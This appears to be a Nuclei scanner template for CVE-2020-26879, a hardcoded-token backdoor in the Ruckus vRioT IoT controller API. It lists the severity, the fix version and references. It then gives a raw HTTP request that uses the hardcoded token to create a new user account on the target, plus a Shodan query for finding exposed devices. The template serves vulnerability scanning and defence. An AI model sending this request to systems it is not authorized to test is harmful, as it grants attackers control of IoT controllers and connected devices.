id: CVE-2020-26879 info: name: Ruckus vRioT IoT Controller - Authentication Bypass author: DhiyaneshDk severity: critical description: | Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py,letting unauthenticated attackers interact with the API without authentication. impact: | Unauthenticated attackers can interact with the API without authentication via a hardcoded token, allowing complete control over the IoT controller and connected devices. remediation: | Update to Ruckus vRioT version 1.5.1.0.22 or later. reference: - https://adepts.of0x.cc/ruckus-vriot-rce/ - https://adepts.of0x.cc - https://twitter.com/TheXC3LL - https://x-c3ll.github.io - https://github.com/alphaSeclab/sec-daily-2020 - https://nvd.nist.gov/vuln/detail/CVE-2020-26879 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26879 cwe-id: CWE-798 epss-score: 0.42479 epss-percentile: 0.98525 cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: commscope product: ruckus_vriot shodan-query: html:"RIoT Controller" tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev,vuln variables: username: "{{randstr_1}}" password: "{{randstr_2}}" http: - raw: - | POST /service/v1/createUser HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Authorization: OlDkR+oocZg= {"username": "{{username}}", "password": "{{password}}"} matchers-condition: and matchers: - type: word part: body words: - '{"ok": 1}' - '{"message":' condition: and - type: word part: body words: - 'Invalid JSON' negative: true - type: status status: - 200 # digest: 490a0046304402204d8a529d364c62aad504aaf47e9d0058b75dd63bed1ba5c2885dde82903e892a0220196f5e5041d730294c0ed695c001952b470d4e13bee7b75bdc0388c93092ae43:922c64590222798bb761d5b6d8e72950